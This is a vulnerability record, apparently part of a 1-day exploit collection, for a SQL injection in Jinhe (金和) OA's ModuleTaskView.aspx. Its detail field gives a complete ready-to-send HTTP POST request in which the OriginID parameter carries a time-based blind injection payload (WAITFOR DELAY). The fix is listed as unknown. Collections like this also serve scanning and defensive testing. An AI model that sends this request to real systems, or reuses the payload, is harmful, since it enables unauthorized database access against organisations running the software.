vendor = "金和"
name = "金和OA ModuleTaskView.aspx SQL注入"
type = "SQL注入"
version = "未知"
path = "/c6/Jhsoft.Web.dailytaskmanage/ModuleTaskView.aspx/"
detail = "POST /c6/Jhsoft.Web.dailytaskmanage/ModuleTaskView.aspx/ HTTP/1.1Host: xxxx.comContent-Type: application/x-www-form-urlencoded _ListPage1LockNumber=1&_ListPage1RecordCount=0&__VIEWSTATE=xxxxx&__VIEWSTATEGENERATOR=09BBB40C&__EVENTTARGET=&__EVENTARGUMENT=&OriginModule=crmexec&OriginID='WAitFor+DelaY'0:0:5'--"
fix = "未知"
date = "0716"
label = "1day"
verifier = "AdySec"
